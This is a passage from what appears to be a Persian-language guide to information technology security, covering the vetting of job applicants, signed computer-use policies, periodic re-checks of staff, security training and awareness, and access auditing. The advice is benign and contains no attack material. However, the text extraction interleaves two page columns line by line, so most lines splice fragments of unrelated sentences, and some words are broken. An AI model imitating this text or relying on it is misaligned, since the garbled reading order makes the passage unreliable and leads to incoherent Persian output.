‫ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ( ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﻧﺪﺍﺭﻳـﺪ‪ .‬ﮔﺮﭼـﻪ‬ ‫ﻓﺮﻣﻬﺎﻱ ﺍﺳﺘﺨﺪﺍﻣﻲ ﺭﺍ ﭘﺮ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﭼﻪ؟ ﺣـﺪﺍﻗﻞ ﻛـﺎﺭ‬
‫ﺁﺯﻣﻮﻧﻬﺎﻱ ﺩﺭﻭﻍﺳﻨﺠﻲ ﻫﻤﻴﺸﻪ ﺩﻗﻴﻖ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﺍﮔـﺮ‬ ‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﻫﺮ ﻣﺘﻘﺎﺿﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻧﺪﻥ‬
‫ﻣﻮﻗﻌﻴــﺖ ﺷــﻐﻠﻲ ﺣــﺴﺎﺳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻣﺘﻘﺎﺿــﻲ ﺩﺭﻧﻈــﺮ‬ ‫ﺧﻮﺩ ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑـﻪ ﮔﺬﺷـﺘﺔ ﺍﻭ ‪ -‬ﺍﺯ‬
‫ﮔﺮﻓﺘﻪﺍﻳﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻔﻴﺪ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺟﻤﻠﻪ ﺩﻻﻳﻞ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ ﻗﺒﻠـﻲﺍﺵ ‪ -‬ﭘـﻲ ﺑﺒﺮﻳـﺪ‪ .‬ﻓﺮﺍﻣـﻮﺵ‬
‫ﻧﻜﻨﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺭﺳﻲ ﺳﻮﺍﺑﻖ‪ ،‬ﺗﺎﺭﻳﺦ ﺍﺳﺘﺨﺪﺍﻣﻬﺎ ﻭ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ‬
‫ﺍﺯ ﻣﺘﻘﺎﺿﻲ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺩﺭ ﺷﻐﻞ ﻣﺮﺑﻮﻃﻪ ﻳﻚ‬ ‫•‬
‫ﻗﺒﻠﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺎﺯﻩﻫﺎﻱ ﺧﺎﻟﻲ ﻣﻴﺎﻥ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺩﻗـﺖ ﻣـﻮﺭﺩ‬
‫ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﺑﻴﺎﻭﺭﺩ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻧﺠﺎﻡ ﺗﻤﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ‬
‫‪١٦١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺍﻃﻼﻋﺎﺕ ﭘـﺸﺖ ﺗﻠﻔـﻦ ﺑﺎﺷـﺪ‪ .‬ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ ﻧﺒﺎﻳـﺪ ﺑـﺪﻟﻴﻞ‬ ‫ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻮﺻﻴﻪ ﻧﻤﻲﺷـﻮﺩ‪ ،‬ﺍﻣـﺎ ﺩﺭ‬
‫ﻣﻮﻗﻌﻴﺘﺸﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻣﺴﺘﺜﻨﻲ ﺷـﻮﻧﺪ ‪ -‬ﺁﻧﻬـﺎ ﻫـﻢ ﺍﮔـﺮ ﻧـﻪ‬ ‫ﻣﻮﺭﺩ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺩﺭ ﭘﺴﺘﻬﺎﻳﻲ ﻛﺎﺭ ﻛﻨﻨﺪ ﻛﻪ‬
‫ﺑﻴﺸﺘﺮ‪ ،‬ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻳﮕﺮ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﺘﺨﺎﺏ ﺭﻣـﺰ‬ ‫ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﺳﻄﺢ ﺑﺎﻻﻳﻲ ﺍﺯ ﺍﻋﺘﻤﺎﺩ ﻧﻴﺎﺯ ﺍﺳـﺖ ﻭ ﺷـﺎﻏﻠﻴﻦ‬
‫ﻋﺒﻮﺭ ﺿﻌﻴﻒ ﻭ ﺳﺎﻳﺮ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻫﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳـﺪ ﭘﺎﻳﺒﻨـﺪﻱ‬ ‫ﻧﻴﺰ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻭﻳـﮋﻩ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﻣـﻲﺷـﻮﻧﺪ ‪ -‬ﻣﺜـﻞ‬
‫ﺧﻮﺩ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ‬ ‫ﺟﺬﺏ ﻭ ﻳﺎ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ ‪ -‬ﺑﺎﻳﺪ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﺑﺎﻻ ﺑﻪ ﭘﺎﺋﻴﻦ ﺟﺮﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻧﻪ ﺑﺎﻟﻌﻜﺲ‪.‬‬ ‫ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﻛﻨﻴﻢ ﺑﻪ ﻣﺘﻘﺎﺿﻲ ﺍﻃﻼﻉ ﺩﻫﻴﺪ‬
‫ﺁﻣﻮﺯﺵ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺍﺳﻨﺎﺩ ﻧﻮﺷﺘﺎﺭﻱ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ‬ ‫ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻨﻴﻦ ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺷﻮﺩ ﻭ ﻣﺒﺎﺣﺜﻲ ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺩ ﺩﺭﺳـﺖ ﻭ ﻧﺎﺩﺭﺳـﺖ‬ ‫ﺍﻳﻨﻜﺎﺭ ﺭﺿﺎﻳﺖ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺟﻠﺐ ﻛﻨﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺮﭼﻨﺪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ )ﺩﺭ‬
‫ﺿﺮﻭﺭﻱ ﻧﻴﺴﺖ ﻭﻟﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻧﺠـﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ‬
‫ﺭﺍﺣﺖﺗﺮ ﺷـﻮﺩ ﻭ ﻣﺘﻘﺎﺿـﻲ ﻣﺘﻮﺟـﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ‬
‫ﺧﻼﻝ ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺳـﺎﻋﺎﺕ ﻛـﺎﺭ(‪ ،‬ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺎﻟﻜﻴـﺖ ﻭ ﻛـﺎﺭﺑﺮﺩ‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﻭﻱ ﻣﺤﺘﺎﻁ ﻭ ﺟـﺪﻱ ﻫـﺴﺘﻴﺪ‪ .‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ‬
‫ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻪ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻣﺘﻘﺎﺿﻲ ﻧﻴـﺎﺯ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ‪ .‬ﻣﺠﺎﺯﺍﺗﻬﺎﻱ ﻧﻘـﺾ ﻣﻘـﺮﺭﺍﺕ‬
‫ﺩﺍﺭﻳﺪ‪.‬‬
‫ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻨﮕﺎﻡ ﺁﻣﻮﺯﺵ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻓﺮﻣﻬﺎﻳﻲ ﻣﺒﻨﻲ ﺑﺮ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻭ‬ ‫ﺑﺮﺭﺳﻴﻬﺎﻱ ﻣﺠﺪﺩ ﻭ ﺩﻭﺭﻩﺍﻱ‬
‫ﭘﺬﻳﺮﻓﺘﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺁﻥ ﺍﻣﻀﺎ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻓﺮﻣﻬـﺎ ﺑﺎﻳـﺪ ﺳـﺎﻟﻬﺎ‬ ‫ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﺯﻣﻮﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﻭ ﻣﺘﻘﺎﺿﻲ ﺭﺍ ﺍﺳـﺘﺨﺪﺍﻡ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﺑﻌﺪﻫﺎ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﺷﺪ ﻛـﻪ ﺁﻳـﺎ ﺑـﻪ‬ ‫ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﻣﺠﺪﺩﹰﺍ ﺍﻧﺠـﺎﻡ‬
‫ﻛﺎﺭﻣﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﻭﻱ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺠـﺎﻡ‬ ‫ﺩﻫﻴﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ﺑﺎﻳﺪ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﻗﺒﻠﻲ ﺭﺍ ﺑـﺎ ﻫـﻢ‬
‫ﺁﻥ ﺍﺳﺖ ﺁﮔﺎﻫﻲ ﻗﺒﻠﻲ ﺩﺍﺩﻩ ﺷﺪﻩ ﻳﺎ ﺧﻴـﺮ‪ ،‬ﺑﺘـﻮﺍﻥ ﻳـﻚ ﻣـﺪﺭﻙ‬ ‫ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ ﺗﺎ ﺑﻪ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﭘـﻲ ﺑﺒﺮﻳـﺪ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺍﺛﺒﺎﺕﻛﻨﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪.‬‬ ‫ﺗﻐﻴﻴﺮﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻛﺎﺭﻣﻨﺪﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺴﺌﻮﻝ ﺳﻴـﺴﺘﻢ‬
‫ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻣﺪﺍﻭﻡ‬
‫ﺣــﺴﺎﺑﺪﺍﺭﻱ ﺷــﻤﺎ ‪ -‬ﺍﺯ ﺟﻤﻠــﻪ ﺗﻬﻴــﺔ ﭼﻜﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺮﺍﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﺍﻃﻼﻋﺎﺕ ﺗﺎﺯﻩﺍﻱ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ‬
‫ﺑــﺴﺘﺎﻧﻜﺎﺭﺍﻥ ‪ -‬ﺑﺎﺷــﺪ‪ ،‬ﺷــﺎﻳﺪ ﻻﺯﻡ ﺑﺎﺷــﺪ ﺍﻋﺘﺒــﺎﺭ ﻣﻮﺟــﻮﺩ ﺩﺭ‬
‫ﺍﻣﻨﻴﺖ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺻﺤﻴﺢ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺑـﺎﺯﺁﻣﻮﺯﻱ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺎﺯﻩﻫـﺎﻱ ﻛﻮﺗـﺎﻩ ﺯﻣـﺎﻧﻲ ﺑﺮﺭﺳـﻲ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﺻﺖ ﻣﻨﺎﺳـﺒﻲ ﺟﻬـﺖ ﻳـﺎﺩﺁﻭﺭﻱ ﺗﻬﺪﻳـﺪﻫـﺎﻱ‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺮﺭﺳﻲ ﻭ ﺗﺤﻘﻴﻖ ﻣﺠﺪﺩ ﺷﻤﺎ ﻫﺮ ﺩﻭ ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ‬
‫ﻣﻮﺟــﻮﺩ ﻭ ﭘﻴﺎﻣــﺪﻫﺎﻱ ﺁﻧﻬــﺎ ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻳــﻚ ﻓــﻀﺎﻱ‬
‫ﺷﻮﺩ ﻭ ﺩﺭﻳﺎﺑﻴﺪ ﻛﻪ ﺭﻓﺘﺎﺭ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﺎﺭﺝ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﻣﺒﺎﺣﺜﻪﺍﻱ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺍﻳﺠـﺎﺩ‬
‫ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻋﻠﻲﺍﻟﻘﺎﻋﺪﻩ ﺗﺼﻤﻴﻢ ﺧﻮﺍﻫﻴﺪ ﮔﺮﻓﺖ ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻣﻮﺭﺩ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺑﻌﻤﻞ ﺑﻴﺎﻭﺭﻳﺪ‪.‬‬
‫ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻓﺮﺻـﺖ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺁﻣﻮﺯﺷـﻬﺎﻱ‬
‫ﺟﺎﺭﻱ ﻭ ﺁﺗﻲ ﺑﺪﻫﻴﺪ؛ ﻣﺜﻞ ﺗﺸﻮﻳﻖ ﺑـﻪ ﺣـﻀﻮﺭ ﺩﺭ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎ ﻭ‬ ‫ﺁﻣﻮﺯﺵ ﺍﻭﻟﻴﻪ‬
‫ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺣﺮﻓﻪﺍﻱ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﺩﺭ ﻧﺸﺮﻳﻪﻫﺎﻱ ﺍﺩﻭﺍﺭﻱ ﺣﺮﻓـﻪﺍﻱ‬ ‫ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷـﻤﺎ ﺩﺭ ﻣـﻮﺭﺩ ﻳـﻚ ﻛﺎﺭﻣﻨـﺪ ﻧﺒﺎﻳـﺪ ﭘـﺲ ﺍﺯ‬
‫ﻭ ﺗﺠﺎﺭﻱ‪ ،‬ﻭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻛﺘﺎﺑﻬﺎﻱ ﻣﺮﺟﻊ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺁﻣﻮﺯﺷﻲ‪.‬‬ ‫ﺍﺳﺘﺨﺪﺍﻡ ﺍﻭ ﻣﺘﻮﻗﻒ ﺷﻮﺩ‪ .‬ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﺣﺘﻤـﹰﺎ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺑﺎﻳــﺪ ﺑــﻪ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺯﻣــﺎﻥ ﻛــﺎﻓﻲ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺘــﺐ ﻭ‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻣﻮﺯﺷﻬﺎﻱ ﺯﻳﺮﺑﻨﺎﻳﻲ ﺑﺒﻴﻨﺪ‪ .‬ﺍﻳﻦ ﺁﻣـﻮﺯﺵ ﺩﺭ‬
‫ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﻳﺎﺩﮔﻴﺮﻱ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺍﺩﻩ ﺷﻮﺩ‪.‬‬ ‫ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺘﺨﺎﺏ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎ )ﺍﻳﻨﻜـﻪ‬
‫ﺩﺭ ﻛﻨﺎﺭ ﺁﻣﻮﺯﺵ ﺩﻭﺭﻩ ﺍﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬
‫ﭼﻪ ﻛﺴﻲ ﻣﺠﺎﺯ ﺍﺳﺖ ﺑﻪ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺘﺼﻞ ﺷﻮﺩ ﻭ ﭼﮕﻮﻧﻪ(‪ ،‬ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﻪ‬
‫ﻼ ﻧـﺼﺐ‬ ‫ﻣﺘﻨﻮﻉﺗﺮﻱ ﺑﺮﺍﻱ ﺗﺪﺍﻭﻡ ﺍﻳﻦ ﺭﻭﻧﺪ ﺑﻬـﺮﻩ ﮔﻴﺮﻳـﺪ ‪ -‬ﻣـﺜ ﹰ‬
‫ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﻧﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ‬
‫ﭘﻮﺳﺘﺮﻫﺎ ﻳﺎ ﺍﻋﻼﻣﻴﻪﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ‪ ،‬ﺍﻋـﻼﻡ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺎ ﺷــﺮﻛﺖ )ﺍﺯ ﻃﺮﻳــﻖ ﺗﻠﻔــﻦ(‪ ،‬ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻓــﺸﺎﻱ‬
‫ﺷﻌﺎﺭﻫﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻭ ﻫﻔﺘﮕﻲ‪ ،‬ﻧﺎﻣﮕﺬﺍﺭﻱ ﻳﻚ ﺭﻭﺯ ﺑﻪ ﻋﻨـﻮﺍﻥ "ﺭﻭﺯ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٦٢‬‬

‫ﺑﺎﻻ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﺭﺍ ﺑﺎﻳﺪ ﻛﻨﺘﺮﻝ ﻛﺮﺩ‪ .‬ﺗﺸﺨﻴﺺ ﺍﻳﻦ ﻣـﺸﻜﻼﺕ ﻭ‬ ‫ﺍﻣﻨﻴﺖ"‪ ،‬ﻭ ﻳﺎ ﺑﺮﮔﺰﺍﺭﻱ ﻧﺸﺴﺘﻬﺎ ﻭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻣﻨﻈﻮﺭ‬
‫ﻞ ﺍﻧـﺴﺎﻧﻴﺖ ﺍﺳـﺖ‪.‬‬‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﻤﻚ ﺑﻪ ﺭﻓﻊ ﺁﻧﻬـﺎ ﺣـﺪﺍﻗ ﹺ‬ ‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﻤﺮﻧﮓ ﺷﺪﻥ ﺍﻫﻤﻴﺖ ﻣﻮﺿـﻮ ﹺﻉ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﻨﻈـﺮ‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﭘـﺮ ﺍﺭﺯﺵ‬ ‫ﻋﻤﻮﻣﻲ‪.‬‬
‫ﺳﺎﺯﻣﺎﻥ ‪ -‬ﺧﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﻧﻴﺰ ﻣﻨﺎﺑﻌﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﺍﻟﺒﺘﻪ ﺍﻧﺪﺍﺯﻩ ﻭ ﻃﺒﻴﻌﺖ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﺳـﻄﺢ ﺗﻬﺪﻳـﺪﺍﺕ ﻭ ﺿـﺮﺭﻫﺎﻱ‬
‫ﺩﺍﺭﻧﺪ ‪ -‬ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫ﺍﺣﺘﻤﺎﻟﻲ‪ ،‬ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻌﺪﺍﺩ ﻭ ﺭﻓﺘﺎﺭ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺍﺯ ﻣﻮﺍﺭﺩﻱ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻃﺮﺣﻬـﺎ ﺑﺎﻳـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ‪.‬‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ‬
‫ﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑـﻪ ﺍﺑـﺰﺍﺭ ﻭ‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﺑﻴﻨ ﹺ‬ ‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﮔﺎﻫﻲﺑﺨـﺶ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﺍﺯ ﻗﺒـﻞ ﺩﺭﻧﻈـﺮ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﺮﻛﺲ ﻛـﻪ‬ ‫ﮔﺮﻓﺘﻪ ﻭ ﺩﺭ ﺑﻮﺩﺟﺔ ﺳﺎﺯﻣﺎﻥ ﺁﻣﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﺯ ﻫﺮ ﻧﻮﻉ ﺩﺳﺘﺮﺳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﺯ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎ‬ ‫ﺑﺮﺭﺳﻲ ﻭ ﻛﻨﺘﺮﻝ ﻛﺎﺭﺁﻳﻲ‬
‫ﺍﻃﻼﻉ ﺩﺍﺭﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑـﻪ ﺍﻳـﻦ‬
